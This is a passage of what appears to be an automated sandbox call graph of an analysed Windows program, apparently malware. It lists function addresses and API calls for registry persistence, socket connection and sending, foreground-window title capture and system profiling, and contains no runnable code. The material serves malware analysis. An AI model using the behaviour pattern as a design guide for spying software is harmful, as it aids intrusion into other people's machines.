40a5db 40190->40192 40191->40192 40192->39953 40194 409316 40193->40194 40195 40cf8c 3 API calls 40194->40195 40196 40931d 40195->40196 40197 40933c 40196->40197 40778 4087e7 40196->40778 40201 40e92f 40197->40201 40199 40932a 40781 40d310 RegCreateKeyA 40199->40781 40202 4021c9 11 API calls 40201->40202 40203 40e943 40202->40203 40794 413e9d 40203->40794 40206 4021c9 11 API calls 40207 40e959 40206->40207 40208 4034cf 22 API calls 40207->40208 40209 40e967 40208->40209 40210 433426 39 API calls 40209->40210 40211 40e974 40210->40211 40212 40e986 40211->40212 40213 40e979 Sleep 40211->40213 40214 402178 28 API calls 40212->40214 40213->40212 40215 40e995 40214->40215 40216 4034cf 22 API calls 40215->40216 40217 40e99e 40216->40217 40218 4021e0 28 API calls 40217->40218 40219 40e9a9 40218->40219 40220 414384 28 API calls 40219->40220 40221 40e9b1 40220->40221 40798 4016e4 WSAStartup 40221->40798 40223 40e9bb 40224 4034cf 22 API calls 40223->40224 40225 40e9c4 40224->40225 40226 4034cf 22 API calls 40225->40226 40274 40ea43 40225->40274 40227 40e9dd 40226->40227 40230 4034cf 22 API calls 40227->40230 40228 4034cf 22 API calls 40228->40274 40229 4021e0 28 API calls 40229->40274 40231 40e9ee 40230->40231 40233 4034cf 22 API calls 40231->40233 40232 414384 28 API calls 40232->40274 40234 40e9ff 40233->40234 40236 4034cf 22 API calls 40234->40236 40237 40ea10 40236->40237 40238 4034cf 22 API calls 40237->40238 40240 40ea21 40238->40240 40239 40209b 28 API calls 40239->40274 40241 4034cf 22 API calls 40240->40241 40242 40ea33 40241->40242 40799 401585 40242->40799 40244 402091 11 API calls 40244->40274 40246 40eb91 WSAGetLastError 41008 414e7e 30 API calls 40246->41008 40249 402a6d 28 API calls 40251 40eba1 40249->40251 40251->40249 40253 413bcc 79 API calls 40251->40253 40256 4034cf 22 API calls 40251->40256 40257 4034fa 11 API calls 40251->40257 40258 433426 39 API calls 40251->40258 40251->40274 40292 402178 28 API calls 40251->40292 40293 402091 11 API calls 40251->40293 40294 4034ff 11 API calls 40251->40294 41009 401c4f 98 API calls 40251->41009 40253->40251 40255 402a91 28 API calls 40255->40274 40256->40251 40257->40251 40259 40f48c Sleep 40258->40259 40259->40251 40260 404804 28 API calls 40260->40274 40261 404779 28 API calls 40261->40274 40262 402178 28 API calls 40262->40274 40263 413bcc 79 API calls 40263->40274 40268 40d033 31 API calls 40268->40274 40269 403509 28 API calls 40269->40274 40274->40228 40274->40229 40274->40232 40274->40239 40274->40244 40274->40246 40274->40251 40274->40255 40274->40260 40274->40261 40274->40262 40274->40263 40274->40268 40274->40269 40275 4034cf 22 API calls 40274->40275 40827 406ba2 40274->40827 40834 40e8ee 40274->40834 40840 401673 40274->40840 40847 401d6f 40274->40847 40862 40170e connect 40274->40862 40922 413dcc 40274->40922 40925 40dfc6 40274->40925 40928 437a48 40274->40928 40932 40d18b RegOpenKeyExA 40274->40932 40935 409344 40274->40935 40941 414209 40274->40941 40944 4142e7 40274->40944 40948 414155 40274->40948 40276 40ee4e GetTickCount 40275->40276 40277 414155 28 API calls 40276->40277 40290 40ee6b 40277->40290 40279 414155 28 API calls 40279->40290 40282 4142e7 28 API calls 40282->40290 40284 406ae8 28 API calls 40284->40290 40285 404804 28 API calls 40285->40290 40286 404779 28 API calls 40286->40290 40288 402091 11 API calls 40288->40290 40289 4034ff 11 API calls 40289->40290 40290->40279 40290->40282 40290->40284 40290->40285 40290->40286 40290->40288 40290->40289 40953 4140ad 40290->40953 40955 41405d 40290->40955 40960 40a7d3 GetLocaleInfoA 40290->40960 40963 4047c1 40290->40963 40972 4018e7 40290->40972 40989 401a3c 40290->40989 40292->40251 40293->40251 40294->40251 40295->39836 40296->39846 40297->39850 40299->39900 40301 413ba2 LoadResource LockResource SizeofResource 40300->40301 40302 40a627 40300->40302 40301->40302 40303 432316 40302->40303 40308 43b5d9 ___crtLCMapStringA 40303->40308 40304 43b617 40320 434256 40304->40320 40306 43b602 RtlAllocateHeap 40307 43b615 40306->40307 40306->40308 40307->39999 40308->40304 40308->40306 40319 43864e 7 API calls 2 library calls 40308->40319 40311 4021aa 40310->40311 40359 402261 40311->40359 40313 4021b5 40363 4023a6 40313->40363 40315 4021c2 40315->40002 40317 40219f 28 API calls 40316->40317 40318 404978 40317->40318 40318->40009 40319->40308 40323 43c698 GetLastError 40320->40323 40324 43c6b1 40323->40324 40325 43c6b7 40323->40325 40349 43d27d 11 API calls 2 library calls 40324->40349 40329 43c70e SetLastError 40325->40329 40342 43af95 40325->40342 40330 43425b 40329->40330 40330->40307 40331 43c6d1 40350 43beb5 40331->40350 40334 43c6e6 40334->40331 40336 43c6ed 40334->40336 40335 43c6d7 40338 43c705 SetLastError 40335->40338 40357 43c486 20 API calls FindHandler 40336->40357 40338->40330 40339 43c6f8 40340 43beb5 _free 17 API calls 40339->40340 40341 43c6fe 40340->40341 40341->40329 40341->40338 40348 43afa2 ___crtLCMapStringA 40342->40348 40343 43afe2 40345 434256 __dosmaperr 19 API calls 40343->40345 40344 43afcd RtlAllocateHeap 40346 43afe0 40344->40346 40344->40348 40345->40346 40346->40331 40356 43d2d3 11 API calls 2 library calls 40346->40356 40348->40343 40348->40344 40358 43864e 7 API calls 2 library calls 40348->40358 40349->40325 40351 43bec0 RtlFreeHeap 40350->40351 40352 43bee9 __dosmaperr 40350->40352 40351->40352 40353 43bed5 40351->40353 40352->40335 40354 434256 __dosmaperr 18 API calls 40353->40354 40355 43bedb GetLastError 40354->40355 40355->40352 40356->40334 40357->40339 40358->40348 40360 4022bb 40359->40360 40361 40226e 40359->40361 40360->40313 40361->40360 40370 402698 11 API calls std::_Deallocate 40361->40370 40364 4023b6 40363->40364 40365 4023d1 40364->40365 40366 4023bc 40364->40366 40381 402723 40365->40381 40371 402405 40366->40371 40369 4023cf 40369->40315 40370->40360 40392 4026bf 40371->40392 40373 402419 40374 402443 40373->40374 40375 40242e 40373->40375 40377 402723 28 API calls 40374->40377 40397 402879 22 API calls 40375->40397 40380 402441 40377->40380 40378 402437 40398 402818 22 API calls 40378->40398 40380->40369 40382 40272f 40381->40382 40383 402790 40382->40383 40384 402738 40382->40384 40401 4026de 22 API calls 40383->40401 40387 402741 40384->40387 40388 402754 40384->40388 40400 4028ba 28 API calls __EH_prolog 40387->40400 40390 402752 40388->40390 40391 402261 11 API calls 40388->40391 40390->40369 40391->40390 40393 4026ca 40392->40393 40394 4026d1 40393->40394 40399 4028af 22 API calls 40393->40399 40394->40373 40397->40378 40398->40380 40400->40390 40403 4021d1 40402->40403 40404 402261 11 API calls 40403->40404 40405 4021dc 40404->40405 40405->40037 40411 40263c 40406->40411 40409->40037 40410->40018 40412 402648 40411->40412 40413 402261 11 API calls 40412->40413 40414 402653 40413->40414 40415 402405 28 API calls 40414->40415 40416 402019 40415->40416 40416->40037 40417->40041 40418->40045 40419->40047 40423 402bae 40421->40423 40422 402bcc 40422->40057 40423->40422 40424 402723 28 API calls 40423->40424 40424->40422 40426 40205b 40425->40426 40429 40251a 40426->40429 40428 40206a 40428->40060 40430 4026bf 22 API calls 40429->40430 40431 40252d 40430->40431 40432 402551 40431->40432 40433 402599 40431->40433 40436 402723 28 API calls 40432->40436 40437 402562 40432->40437 40438 4026de 22 API calls 40433->40438 40436->40437 40437->40428 40440 40204a 40439->40440 40449 40248f 40440->40449 40442 402056 40442->40062 40444 40211c 40443->40444 40445 402261 11 API calls 40444->40445 40446 402136 40445->40446 40461 4025a1 40446->40461 40450 40249f 40449->40450 40451 4024a5 40450->40451 40452 4024ba 40450->40452 40453 40251a 28 API calls 40451->40453 40454 4024d0 40452->40454 40455 402512 40452->40455 40459 4024b8 40453->40459 40458 402723 28 API calls 40454->40458 40454->40459 40460 4026de 22 API calls 40455->40460 40458->40459 40459->40442 40462 4025b3 40461->40462 40463 402261 11 API calls 40462->40463 40464 402147 40463->40464 40464->40065 40465->40073 40466->40079 40468 402255 40467->40468 40468->40083 40470 4139b4 40469->40470 40471 41445f GetCurrentProcess 40469->40471 40472 40d033 RegOpenKeyExA 40470->40472 40471->40470 40473 40d061 RegQueryValueExA RegCloseKey 40472->40473 40474 40d08b 40472->40474 40473->40474 40475 402178 28 API calls 40474->40475 40476 40d0a0 40475->40476 40476->40089 40477->40097 40479 4152e1 40478->40479 40484 4035a8 40479->40484 40481 4152ec 40488 41542e 40481->40488 40483 4152f9 40483->40104 40485 403602 40484->40485 40486 4035b5 40484->40486 40485->40481 40486->40485 40495 4036df 11 API calls std::_Deallocate 40486->40495 40489 415468 40488->40489 40490 41543a 40488->40490 40507 4026de 22 API calls 40489->40507 40496 403723 40490->40496 40494 415444 40494->40483 40495->40485 40497 40372f 40496->40497 40498 403790 40497->40498 40499 403738 40497->40499 40509 4026de 22 API calls 40498->40509 40502 403741 40499->40502 40504 403754 40499->40504 40508 403856 28 API calls __EH_prolog 40502->40508 40505 403752 40504->40505 40506 4035a8 11 API calls 40504->40506 40505->40494 40506->40505 40508->40505 40510->40113 40512 406833 40511->40512 40513 4035a8 11 API calls 40512->40513 40514 4068b5 40513->40514 40514->40113 40516 402395 40515->40516 40517 4023a6 28 API calls 40516->40517 40518 402198 40517->40518 40518->39888 40535 4332d3 40519->40535 40521 432696 40540 4331fc 40521->40540 40523 432670 40525 434256 __dosmaperr 20 API calls 40523->40525 40524 43265b 40524->40521 40524->40523 40526 432675 __cftof 40524->40526 40525->40526 40526->40132 40528 4326a2 40529 4326d1 40528->40529 40548 433318 39 API calls __Toupper 40528->40548 40530 43273d 40529->40530 40549 43327f 20 API calls 2 library calls 40529->40549 40550 43327f 20 API calls 2 library calls 40530->40550 40533 432804 swprintf 40533->40526 40534 434256 __dosmaperr 20 API calls 40533->40534 40534->40526 40536 4332eb 40535->40536 40537 4332d8 40535->40537 40536->40524 40538 434256 __dosmaperr 20 API calls 40537->40538 40539 4332dd __cftof 40538->40539 40539->40524 40541 433219 40540->40541 40542 43320f 40540->40542 40541->40542 40551 43c614 35 API calls 4 library calls 40541->40551 40542->40528 40544 43323a 40552 43cb84 35 API calls __Getctype 40544->40552 40546 433253 40553 43cbb1 35 API calls __cftof 40546->40553 40548->40528 40549->40530 40550->40533 40551->40544 40552->40546 40553->40542 40564 4376d7 40554->40564 40556 415169 SetConsoleOutputCP 40557 4150e5 GetStdHandle GetConsoleScreenBufferInfo SetConsoleTextAttribute 40556->40557 40558 413981 76 API calls 40557->40558 40559 415119 SetConsoleTextAttribute 40558->40559 40559->40139 40561 41398f 40560->40561 40586 413963 40561->40586 40566 4376e3 CallCatchBlock 40564->40566 40565 4376f1 40567 434256 __dosmaperr 20 API calls 40565->40567 40566->40565 40568 437723 40566->40568 40569 437712 40566->40569 40576 4376f6 __cftof CallCatchBlock 40567->40576 40568->40565 40571 43773b 40568->40571 40570 434256 __dosmaperr 20 API calls 40569->40570 40570->40576 40572 43774b 40571->40572 40573 43773f 40571->40573 40583 433f25 EnterCriticalSection 40572->40583 40575 434256 __dosmaperr 20 API calls 40573->40575 40575->40576 40576->40556 40577 437756 40579 43776f 40577->40579 40584 433b87 62 API calls 3 library calls 40577->40584 40580 4377c5 40579->40580 40581 434256 __dosmaperr 20 API calls 40579->40581 40585 4377df LeaveCriticalSection 40580->40585 40581->40580 40583->40577 40584->40579 40585->40576 40587 413972 ___scrt_initialize_default_local_stdio_options 40586->40587 40590 437555 40587->40590 40589 40a489 CreateThread 40589->39902 41857 415962 GetModuleFileNameA 40589->41857 40591 437585 40590->40591 40592 43759a 40590->40592 40593 434256 __dosmaperr 20 API calls 40591->40593 40592->40591 40594 43759e 40592->40594 40596 43758a __cftof 40593->40596 40597 43570f 40594->40597 40596->40589 40600 4356be 40597->40600 40599 435733 40599->40596 40601 4356ca CallCatchBlock 40600->40601 40608 433f25 EnterCriticalSection 40601->40608 40603 4356d8 40609 435dee 40603->40609 40607 4356f6 CallCatchBlock 40607->40599 40608->40603 40625 43ea93 40609->40625 40612 4331fc __cftof 35 API calls 40613 435e28 40612->40613 40634 435d7b 40613->40634 40617 435e68 40649 435db0 40617->40649 40622 42c8db __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 40623 4356e5 40622->40623 40624 435703 LeaveCriticalSection 40623->40624 40624->40607 40656 43d755 40625->40656 40627 43eaa2 40661 447577 40627->40661 40629 43eaa8 40633 435e11 40629->40633 40668 43b5d9 21 API calls 3 library calls 40629->40668 40631 43eb07 40632 43beb5 _free 20 API calls 40631->40632 40632->40633 40633->40612 40635 435d9a swprintf 40634->40635 40636 434256 __dosmaperr 20 API calls 40635->40636 40637 435da6 40636->40637 40638 436021 40637->40638 40669 4371a6 20 API calls 2 library calls 40638->40669 40640 436046 40641 434256 __dosmaperr 20 API calls 40640->40641 40642 436035 __cftof 40641->40642 40642->40617 40643 436031 swprintf 40643->40640 40643->40642 40670 4363be 20 API calls 2 library calls 40643->40670 40671 436c6a 39 API calls swprintf 40643->40671 40672 436512 39 API calls swprintf 40643->40672 40673 43653a 50 API calls 3 library calls 40643->40673 40674 43680c 50 API calls swprintf 40643->40674 40650 43beb5 _free 20 API calls 40649->40650 40651 435dc0 40650->40651 40652 43eb48 40651->40652 40653 43eb53 40652->40653 40654 435e97 40652->40654 40653->40654 40675 4339a0 40653->40675 40654->40622 40657 43d761 40656->40657 40658 43d776 40656->40658 40659 434256 __dosmaperr 20 API calls 40657->40659 40658->40627 40660 43d766 __cftof 40659->40660 40660->40627 40662 447584 40661->40662 40663 447591 40661->40663 40664 434256 __dosmaperr 20 API calls 40662->40664 40665 434256 __dosmaperr 20 API calls 40663->40665 40666 44759d 40663->40666 40667 447589 __cftof 40664->40667 40665->40667 40666->40629 40667->40629 40668->40631 40669->40643 40670->40643 40671->40643 40672->40643 40673->40643 40674->40643 40676 4339b8 40675->40676 40680 4339b4 40675->40680 40677 43d755 20 API calls 40676->40677 40676->40680 40678 4339d8 40677->40678 40679 43e210 __wsopen_s 59 API calls 40678->40679 40679->40680 40680->40654 40686 40205b 40681->40686 40683 404789 40684 40210e 11 API calls 40683->40684 40685 404798 40684->40685 40685->40155 40687 40251a 28 API calls 40686->40687 40688 40206a 40687->40688 40688->40683 40690 403514 40689->40690 40691 4035a8 11 API calls 40690->40691 40692 40351f 40691->40692 40705 403621 40692->40705 40695 409450 40717 4094b7 40695->40717 40697 409460 40721 406547 40697->40721 40700 407d1f 40742 4067ef 40700->40742 40702 407d2f 40703 406547 11 API calls 40702->40703 40704 407d3e 40703->40704 40704->40173 40706 40362f char_traits 40705->40706 40709 403640 40706->40709 40708 403529 40708->40695 40710 403650 40709->40710 40711 403656 40710->40711 40712 40366d 40710->40712 40716 4037c7 28 API calls 40711->40716 40713 403723 28 API calls 40712->40713 40715 40366b 40713->40715 40715->40708 40716->40715 40718 4094c5 char_traits 40717->40718 40727 4094d7 40718->40727 40720 4094d2 40720->40697 40722 406555 40721->40722 40723 4035a8 11 API calls 40722->40723 40724 40656f 40723->40724 40725 406821 11 API calls 40724->40725 40726 406580 40725->40726 40726->40700 40728 4094e7 40727->40728 40729 409505 40728->40729 40730 4094ed 40728->40730 40731 4026bf 22 API calls 40729->40731 40740 406f79 28 API calls 40730->40740 40732 40950d 40731->40732 40734 409581 40732->40734 40735 409524 40732->40735 40741 4026de 22 API calls 40734->40741 40737 403723 28 API calls 40735->40737 40739 409503 40735->40739 40737->40739 40739->40720 40740->40739 40743 4067fd char_traits 40742->40743 40746 406962 40743->40746 40745 406809 40745->40702 40747 406972 40746->40747 40748 406978 40747->40748 40749 40698f 40747->40749 40757 4069f2 28 API calls 40748->40757 40751 4069a5 40749->40751 40752 4069ea 40749->40752 40755 403723 28 API calls 40751->40755 40756 40698d 40751->40756 40758 4026de 22 API calls 40752->40758 40755->40756 40756->40745 40757->40756 40760 402c77 40759->40760 40763 402dd6 40760->40763 40762 402c84 40762->40179 40764 402de6 40763->40764 40765 402e02 40764->40765 40766 402dec 40764->40766 40767 4026bf 22 API calls 40765->40767 40776 4030b6 28 API calls 40766->40776 40768 402e0a 40767->40768 40770 402e21 40768->40770 40771 402e7d 40768->40771 40773 402723 28 API calls 40770->40773 40775 402e00 40770->40775 40777 4026de 22 API calls 40771->40777 40773->40775 40775->40762 40776->40775 40784 433831 40778->40784 40782 40d352 40781->40782 40783 40d328 RegSetValueExA RegCloseKey 40781->40783 40782->40197 40783->40782 40787 4337b2 40784->40787 40786 4087ed 40786->40199 40788 4337c1 40787->40788 40789 4337d5 40787->40789 40790 434256 __dosmaperr 20 API calls 40788->40790 40792 4337c6 __alldvrm __cftof 40789->40792 40793 43d396 11 API calls 2 library calls 40789->40793 40790->40792 40792->40786 40793->40792 40796 413ee7 ___scrt_fastfail 40794->40796 40795 402178 28 API calls 40797 40e94e 40795->40797 40796->40795 40797->40206 40798->40223 41010 4199cf 40799->41010 40801 401593 40802 401598 40801->40802 41022 41c619 40801->41022 40804 402178 28 API calls 40802->40804 40826 4015bb 40802->40826 40806 4015a7 40804->40806 40805 4015ca 41026 4190f7 40805->41026 40808 402178 28 API calls 40806->40808 40810 4015b6 40808->40810 40809 4015d1 40809->40802 41035 41a104 40809->41035 40812 413bcc 79 API calls 40810->40812 40812->40826 40816 401615 40819 402178 28 API calls 40816->40819 40817 40164b 41043 41a0e7 40817->41043 40820 401624 40819->40820 40821 402178 28 API calls 40820->40821 40822 401633 40821->40822 40823 413bcc 79 API calls 40822->40823 40824 401638 40823->40824 41046 415d66 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 40824->41046 40826->40274 40828 4021c9 11 API calls 40827->40828 40829 406bb1 40828->40829 40830 402ba1 28 API calls 40829->40830 40831 406bcd 40830->40831 40832 40206e 28 API calls 40831->40832 40833 406bd5 40832->40833 40833->40274 40835 40e907 WSASetLastError 40834->40835 40836 40e8fd 40834->40836 40835->40274 41159 40e783 29 API calls ___std_exception_copy 40836->41159 40838 40e902 40838->40835 40841 40168c socket 40840->40841 40842 40167f 40840->40842 40844 4016a6 CreateEventW 40841->40844 40845 401688 40841->40845 41160 4016e4 WSAStartup 40842->41160 40844->40274 40845->40274 40846 401684 40846->40841 40846->40845 40848 401d83 40847->40848 40849 401e08 40847->40849 40850 401d8c 40848->40850 40851 401dde CreateEventA CreateThread 40848->40851 40852 401d9b GetLocalTime 40848->40852 40849->40274 40850->40851 40851->40849 41161 401f6e 40851->41161 40853 414155 28 API calls 40852->40853 40854 401daf 40853->40854 40855 402a6d 28 API calls 40854->40855 40856 401dbf 40855->40856 40857 402178 28 API calls 40856->40857 40858 401dce 40857->40858 40859 413bcc 79 API calls 40858->40859 40860 401dd3 40859->40860 40861 402091 11 API calls 40860->40861 40861->40851 40863 401861 40862->40863 40864 401734 40862->40864 40865 401867 WSAGetLastError 40863->40865 40916 4017c4 40863->40916 40866 401769 40864->40866 40868 402a91 28 API calls 40864->40868 40864->40916 40867 401877 40865->40867 40865->40916 41165 419105 40866->41165 40869 401778 40867->40869 40870 40187c 40867->40870 40873 401755 40868->40873 40876 402178 28 API calls 40869->40876 41186 414e7e 30 API calls 40870->41186 40877 402178 28 API calls 40873->40877 40875 401787 40885 401796 40875->40885 40886 4017cd 40875->40886 40879 4018c6 40876->40879 40880 401764 40877->40880 40878 401886 40881 402a6d 28 API calls 40878->40881 40882 402178 28 API calls 40879->40882 40883 413bcc 79 API calls 40880->40883 40884 401896 40881->40884 40887 4018d5 40882->40887 40883->40866 40888 402178 28 API calls 40884->40888 40891 402178 28 API calls 40885->40891 41173 419e09 57 API calls 40886->41173 40892 413bcc 79 API calls 40887->40892 40890 4018a5 40888->40890 40894 413bcc 79 API calls 40890->40894 40895 4017a5 40891->40895 40892->40916 40893 4017d5 40896 40180a 40893->40896 40897 4017da 40893->40897 40898 4018aa 40894->40898 40899 402178 28 API calls 40895->40899 41174 4192a0 40896->41174 40900 402178 28 API calls 40897->40900 40901 402091 11 API calls 40898->40901 40902 4017b4 40899->40902 40904 4017e9 40900->40904 40901->40916 40905 413bcc 79 API calls 40902->40905 40907 402178 28 API calls 40904->40907 40920 4017b9 40905->40920 40909 4017f8 40907->40909 40908 40183f CreateEventW CreateEventW 40908->40916 40912 413bcc 79 API calls 40909->40912 40910 402178 28 API calls 40911 401828 40910->40911 40914 402178 28 API calls 40911->40914 40915 4017fd 40912->40915 40917 401837 40914->40917 41185 419552 55 API calls 40915->41185 40916->40274 40919 413bcc 79 API calls 40917->40919 40921 40183c 40919->40921 41184 416c2d DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 40920->41184 40921->40908 41218 413da2 GlobalMemoryStatusEx 40922->41218 40924 413de1 40924->40274 41219 40df86 40925->41219 40929 437a54 40928->40929 41245 437844 40929->41245 40931 437a75 40931->40274 40933 40d1b1 RegQueryValueExA RegCloseKey 40932->40933 40934 40d1d5 40932->40934 40933->40934 40934->40274 40936 409360 40935->40936 40937 40cf8c 3 API calls 40936->40937 40939 409367 40937->40939 40938 40937f 40938->40274 40939->40938 41249 40cfd6 RegOpenKeyExA 40939->41249 40942 40219f 28 API calls 40941->40942 40943 41421e 40942->40943 40943->40274 40945 4142f4 40944->40945 40946 40219f 28 API calls 40945->40946 40947 414306 40946->40947 40947->40274 40949 437a48 20 API calls 40948->40949 40950 414179 40949->40950 40951 402178 28 API calls 40950->40951 40952 414187 40951->40952 40952->40274 40954 4140c3 GetTickCount 40953->40954 40954->40290 40956 42ec70 ___scrt_fastfail 40955->40956 40957 41407c GetForegroundWindow GetWindowTextW 40956->40957 40958 403509 28 API calls 40957->40958 40959 4140a6 40958->40959 40959->40290 40961 402178 28 API calls 40960->40961 40962 40a7f8 40961->40962 40962->40290 40964 4021c9 11 API calls 40963->40964 40965 4047cd 40964->40965 40966 402ba1 28 API calls 40965->40966 40967 4047ea 40966->40967 40968 40206e 28 API calls 40967->40968 40969 4047f2 40968->40969 40970 40206e 28 API calls 40969->40970 40971 4047fe 40970->40971 40971->40290 40973 4018fa 40972->40973 41252 40214e 40973->41252 40975 40190a 40976 40206e 28 API calls 40975->40976 40977 40193f 40976->40977 40978 401964 WaitForSingleObject 40977->40978 40979 401944 40977->40979 40980 40197a 40978->40980 40981 401956 send 40979->40981 41258 4194da 40980->41258 40982 40199f 40981->40982 40985 402091 11 API calls 40982->40985 40986 4019a7 40985->40986 40987 402091 11 API calls 40986->40987 40988 4019af 40987->40988 40988->40290 40990 4021c9 11 API calls 40989->40990 40991 401a53 40990->40991 40992 4021c9 11 API calls 40991->40992 40995 401a5c 40992->40995 40993 432316 ___std_exception_copy 21 API calls 40993->40995 40995->40993 40996 40219f 28 API calls 40995->40996 40997 401acd 40995->40997 40998 40209b 28 API calls 40995->40998 41001 402091 11 API calls 40995->41001 41004 40206e 28 API calls 40995->41004 41305 4019ba 40995->41305 41311 401aef 40995->41311 40996->40995 41323 401c4f 98 API calls 40997->41323 40998->40995 41000 401ad4 41002 402091 11 API calls 41000->41002 41001->40995 41003 401add 41002->41003 41005 402091 11 API calls 41003->41005 41004->40995 41006 401ae6 41005->41006 41006->40251 41008->40251 41009->40251 41011 419a08 41010->41011 41016 4199de 41010->41016 41014 4199fc 41011->41014 41049 42bb1c EnterCriticalSection 41011->41049 41013 419a13 41013->41014 41050 42bb26 LeaveCriticalSection 41013->41050 41014->40801 41015 4199e7 41015->40801 41016->41015 41047 42bb08 InitializeCriticalSection 41016->41047 41019 419a24 41019->40801 41020 4199f8 41020->41014 41048 42bb08 InitializeCriticalSection 41020->41048 41023 41c61e 41022->41023 41051 42a8be 41023->41051 41025 41c626 41025->40805 41027 419097 41026->41027 41028 4190a8 41027->41028 41029 4199cf 3 API calls 41027->41029 41030 4190ad 41028->41030 41031 42a8be 21 API calls 41028->41031 41029->41028 41030->40809 41032 4190cb 41031->41032 41033 4190e7 41032->41033 41056 415d66 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 41032->41056 41033->40809 41036 41a113 41035->41036 41057 419aea 41036->41057 41038 4015ef 41038->40802 41039 41a137 41038->41039 41040 41a146 41039->41040 41041 419aea 51 API calls 41040->41041 41042 40160e 41041->41042 41042->40816 41042->40817 41155 41a0be 41043->41155 41046->40826 41047->41020 41048->41011 41049->41013 41050->41019 41052 42a8c8 41051->41052 41053 42a8cc 41051->41053 41052->41025 41054 432316 ___std_exception_copy 21 API calls 41053->41054 41055 42a8d1 41054->41055 41055->41025 41056->41033 41058 419b0a 41057->41058 41061 419b7c ctype 41058->41061 41070 419b26 41058->41070 41083 4232bc 21 API calls ___scrt_fastfail 41058->41083 41060 419bcd 41060->41070 41089 419d5a 51 API calls 41060->41089 41061->41060 41062 419be0 41061->41062 41063 419bf9 41061->41063 41071 4197ae 41062->41071 41065 419c03 41063->41065 41066 419cfd 41063->41066 41084 421a47 41065->41084 41066->41070 41090 419a29 22 API calls 41066->41090 41070->41038 41072 4197dc 41071->41072 41081 4197cb 41071->41081 41091 422db7 41072->41091 41074 4197fe 41074->41081 41098 419670 EnterCriticalSection LeaveCriticalSection 41074->41098 41076 419877 41076->41081 41099 4231ce 21 API calls ___scrt_fastfail 41076->41099 41078 419884 41078->41081 41100 42bb1c EnterCriticalSection 41078->41100 41080 419970 41080->41081 41101 42bb26 LeaveCriticalSection 41080->41101 41081->41060 41083->41061 41140 4219c7 41084->41140 41086 421a5b _memcmp 41088 421a91 41086->41088 41148 420fc9 41086->41148 41088->41060 41089->41070 41090->41070 41102 422e4d 41091->41102 41094 42a8be 21 API calls 41095 422de3 ctype 41094->41095 41096 42a8be 21 API calls 41095->41096 41097 422de9 ctype 41095->41097 41096->41097 41097->41074 41098->41076 41099->41078 41100->41080 41101->41081 41103 422e6d 41102->41103 41105 422dce 41102->41105 41104 421a47 23 API calls 41103->41104 41106 423022 41103->41106 41108 422e8f 41104->41108 41105->41094 41105->41095 41105->41097 41106->41105 41109 4230fe 41106->41109 41118 421c17 41106->41118 41108->41105 41112 422eed 41108->41112 41128 422a0c 21 API calls 41108->41128 41109->41105 41132 421e84 43 API calls _memcmp 41109->41132 41112->41105 41112->41106 41114 422fb8 41112->41114 41129 4196d5 EnterCriticalSection LeaveCriticalSection 41112->41129 41115 422fe3 41114->41115 41130 4196d5 EnterCriticalSection LeaveCriticalSection 41114->41130 41115->41106 41131 419743 EnterCriticalSection LeaveCriticalSection 41115->41131 41119 421c2f 41118->41119 41122 421c81 41118->41122 41120 42a8be 21 API calls 41119->41120 41121 421c6e 41119->41121 41119->41122 41120->41121 41121->41122 41123 42a8be 21 API calls 41121->41123 41127 421c78 41121->41127 41122->41109 41125 421d00 41123->41125 41125->41122 41139 423647 22 API calls 41125->41139 41127->41122 41133 42649c 41127->41133 41128->41112 41129->41114 41130->41115 41131->41106 41132->41105 41134 4264ad 41133->41134 41138 4264f3 41133->41138 41135 4264ee 41134->41135 41136 423405 22 API calls 41134->41136 41134->41138 41137 426574 48 API calls 41135->41137 41135->41138 41136->41135 41137->41138 41138->41122 41139->41127 41141 421a3a 41140->41141 41142 4219d5 41140->41142 41141->41086 41142->41141 41152 42111e 21 API calls ctype 41142->41152 41144 421a15 41144->41141 41153 421952 22 API calls 41144->41153 41146 421a26 41154 42111e 21 API calls ctype 41146->41154 41151 420ff5 41148->41151 41149 42a8be 21 API calls 41150 420ffb ctype 41149->41150 41150->41088 41151->41149 41151->41150 41152->41144 41153->41146 41154->41141 41156 41a0c5 41155->41156 41157 419aea 51 API calls 41156->41157 41158 41a0e2 41157->41158 41158->40802 41159->40838 41160->40846 41164 401f7f 101 API calls 41161->41164 41163 401f7a 41164->41163 41166 41911a 41165->41166 41167 401771 41165->41167 41168 42a8be 21 API calls 41166->41168 41167->40869 41167->40875 41169 419124 41168->41169 41169->41167 41187 4164cd 41169->41187 41173->40893 41175 4192ad 41174->41175 41178 401812 41174->41178 41176 42a8be 21 API calls 41175->41176 41175->41178 41177 4192c9 41176->41177 41177->41178 41179 4164cd 27 API calls 41177->41179 41178->40908 41178->40910 41180 4192da 41179->41180 41181 4192e8 41180->41181 41216 4191ab 22 API calls 41180->41216 41181->41178 41217 416c2d DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 41181->41217 41184->40916 41185->40920 41186->40878 41188 4164e4 ctype ___scrt_fastfail 41187->41188 41189 4166ec 41188->41189 41191 42a8be 21 API calls 41188->41191 41194 41669a 41189->41194 41202 41606a DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 41189->41202 41193 416693 ___scrt_fastfail 41191->41193 41192 4166fd 41192->41194 41195 42a8be 21 API calls 41192->41195 41193->41194 41197 42a8be 21 API calls 41193->41197 41194->41167 41201 416c2d DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 41194->41201 41196 416736 41195->41196 41196->41194 41203 42af2a 41196->41203 41199 4166c2 ___scrt_fastfail 41197->41199 41199->41194 41200 42a8be 21 API calls 41199->41200 41200->41189 41201->41167 41202->41192 41206 42ae49 41203->41206 41205 42af32 41205->41194 41207 42ae62 41206->41207 41211 42ae58 41206->41211 41208 42a8be 21 API calls 41207->41208 41207->41211 41209 42ae83 41208->41209 41209->41211 41212 42b1e6 CryptAcquireContextA 41209->41212 41211->41205 41213 42b20a CryptGenRandom 41212->41213 41214 42b205 41212->41214 41213->41214 41215 42b21e CryptReleaseContext 41213->41215 41214->41211 41215->41214 41216->41181 41217->41178 41218->40924 41222 40df57 41219->41222 41223 40df6d ___scrt_initialize_default_local_stdio_options 41222->41223 41226 4375cc 41223->41226 41229 4358b3 41226->41229 41230 4358f3 41229->41230 41231 4358db 41229->41231 41230->41231 41233 4358fb 41230->41233 41232 434256 __dosmaperr 20 API calls 41231->41232 41236 4358e0 __cftof 41232->41236 41234 4331fc __cftof 35 API calls 41233->41234 41235 43590b 41234->41235 41237 435d7b swprintf 20 API calls 41235->41237 41238 